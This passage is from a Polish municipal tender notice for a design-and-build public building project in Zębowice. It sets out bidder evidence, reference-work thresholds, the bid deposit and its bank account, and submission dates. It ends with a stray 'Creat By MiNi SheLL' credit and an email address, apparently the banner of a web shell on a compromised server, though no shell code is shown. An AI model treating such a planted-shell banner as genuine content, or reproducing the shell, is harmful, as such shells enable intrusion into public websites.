urządzeń, w szczególności: urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>c.	konstrukcyjno-budowlanej bez ograniczeń, to jest instalacyjnej w zakresie w zakresie: sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. <br/>Wszystkie osoby winny posiadać decyzję o nadaniu uprawnień budowlanych oraz być wpisane na listę członków Izby Architektów RP. lub Centralnego Rejestr Osób Posiadających Uprawnienia Budowlane, prowadzonego przez GINB.<br/>2. do wykonania robót budowlanych:<br/>Szczegół w SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy oraz spełnienia przez <br/> niego warunków udziału w postępowaniu o udzielenie zamówienia publicznego, <br/> zamawiający żąda złożenia przez wykonawcę następujących podmiotowych środków <br/> dowodowych.<br/><br/>7.1. wraz z ofertą, wykonawca składa oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, <br/> a w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, składających <br/> ofertę wspólną, oświadczenie to składa każdy z wykonawców oddzielnie (zał. nr 2 do <br/> SWZ);<br/><br/>7.2. przed wyborem najkorzystniejszej oferty, na wezwanie zamawiającego w wyznaczonym <br/> przez niego terminie, nie krótszym jednak niż 5 dni, wykonawca, którego oferta została <br/> najwyżej oceniona, składa aktualne na dzień złożenia oferty podmiotowe środki <br/> dowodowe w postaci:<br/> 1. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej stanowiący zał. nr 6 do SWZ; <br/>2.	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w ust. 7.1. SWZ w zakresie podstaw wykluczenia z postępowania (zał. nr 8);<br/>3.	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (zał. nr 3 do SWZ),<br/>4.	wykazu usług wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; (zał. nr 3 do SWZ),<br/>5.	Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami. (zał. nr 4 do SWZ)<br/><br/>7.3 Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>7.4. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów rejestrowych, zamawiający żąda od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy. Wymóg ten stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy. Szczegóły w SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Szczegółowo w SWZ 6.3.1.	O wykonanie zamówienie mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej jedną robotę budowlaną, zrealizowaną poprzez jej zaprojektowanie i wykonanie, o której mowa w art.103 ust. 2 Pzp (dalej też - zaprojektuj i wybuduj), polegającej w szczególności na: <br/>1)	opracowaniu dokumentacji projektowej w zakresie budowy lub przebudowy budynku wraz ze zmianą sposobu jego użytkowania, to jest budynku użyteczności publicznej, w szczególności takiego jak: budynek szkoły, przedszkola, żłobku itp., o wartości robót co najmniej 1.500.000,00 zł oraz o powierzchni użytkowej minimum 700 m2 <br/>w następujących zakresach: <br/>a.	kompleksowa termomodernizacja budynku polegająca na dociepleniu (ścian zewnętrzne, wymianie stolarki okiennej i drzwiowej oraz dociepleniu pokrycia dachowego), <br/>b.	instalacje wodno-kanalizacyjne,<br/>c.	instancje centralnego ogrzewania,<br/>d.	instalacji elektryczne,<br/>e.	instalacji sieci telefonicznej i LAN<br/>2)	wykonaniu robót budowlanych w zakresie budowy, przebudowy wraz ze zmianą sposobu użytkowania budynku użyteczności publicznej, w szczególności takiego jak: budynek szkoły, przedszkola, żłobka itp. o wartości co najmniej 1.500.000,00 zł oraz o powierzchni użytkowej minimum 700 m2; <br/> 3) wykonaniu robót budowlanych w zakresie budowy, przebudowy wraz ze zmianą <br/> sposobu użytkowania budynku użyteczności publicznej, w szczególności takiego jak: <br/> budynek szkoły, przedszkola, żłobka itp. o wartości co najmniej 1.500.000,00 zł oraz <br/> o powierzchni użytkowej minimum 700 m2.<br/><br/>6.3.1.1. Za spełnienie w/w warunków zamawiający uzna, wykonanie przez wykonawcę <br/> zamówienia publicznego, który zrealizował:<br/>1) w wyniku jednego postępowania, w formacie zaprojektuj i wybuduj, <br/> zamówienie zaprojektowania i wykonania robót budowlanych;<br/>2) w wyniku w dwóch postępowaniach, w formacie zaprojektuj i wybuduj <br/> zamówienia:<br/>a. w jednym dokumentacje projektową,<br/>b. w drugim roboty budowlane. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca, zobowiązany jest do wnieść wadium w kwocie 20 000,00 zł <br/> (słownie: dwadzieścia tysięcy złotych).<br/><br/>21.1. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje <br/> nieprzerwanie do dnia upływu terminu związania ofertą, to jest do dnia 13.03.2023r.<br/><br/>21.2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku <br/> następujących formach: <br/> 1) pieniądzu; <br/> 2) gwarancjach bankowych; <br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 <br/> ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/> Przedsiębiorczości (Dz. U. z 2020 r. poz. 299 oraz z 2022 r. poz. 807 i 1079). <br/><br/> 21.3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/> wskazany przez zamawiającego. <br/><br/>21.4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym <br/><br/>21.5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w <br/> ust. 23.2. w pkt 2) i 3), 4) SWZ, wykonawca przekazuje zamawiającemu oryginał <br/> gwarancji lub poręczenia, w postaci elektronicznej.<br/><br/>21.6. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/> Banku Spółdzielczego oddział w Zębowicach, nr rachunku : <br/>82 8909 1029 2002 0000 2437 0003.<br/><br/> 21.7. Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej <br/> przed upływem terminu składania ofert (decyduje data wpływu na rachunek <br/> bankowy Zamawiającego).<br/><br/>21.8. Wadium wnoszone w formie, o których mowa w ust. 23.2. pkt 2), 3), 4) SWZ , należy <br/> załączyć do oferty w oryginale w postaci dokumentu elektronicznego <br/> podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę <br/> dokumentu. <br/><br/>21.9. Treść dokumentu wadialnego, złożonego w formie gwarancji lub poręczenia, <br/> powinna zawierać co najmniej następujące zapisy:<br/> - nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), <br/> - gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym <br/> w gwarancji lub poręczeniu musi być Gmina Zębowice,<br/> - określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/> - kwotę gwarancji/poręczenia,<br/> - termin ważności gwarancji/poręczenia,<br/> - zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, <br/> na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 <br/> ust. 6 Pzp.<br/><br/>21.9. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 <br/> Pzp.<br/><br/>21.10. W przypadku wniesienia wadium w pieniądzu Zamawiający zatrzymuje wadium <br/> wraz z odsetkami, a w przypadku wniesienia go w formie gwarancji lub <br/> poręczenia, o których mowa w ust. 23.2. pkt 2), 3), 4) SWZ, występuje <br/> odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium w <br/> przypadku wystąpienia przesłanek, o których mowa w art. 98 ust. 6 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zawiera załącznik nr 7 do SWZ projekt Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-14 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gminazebowice.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-14 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com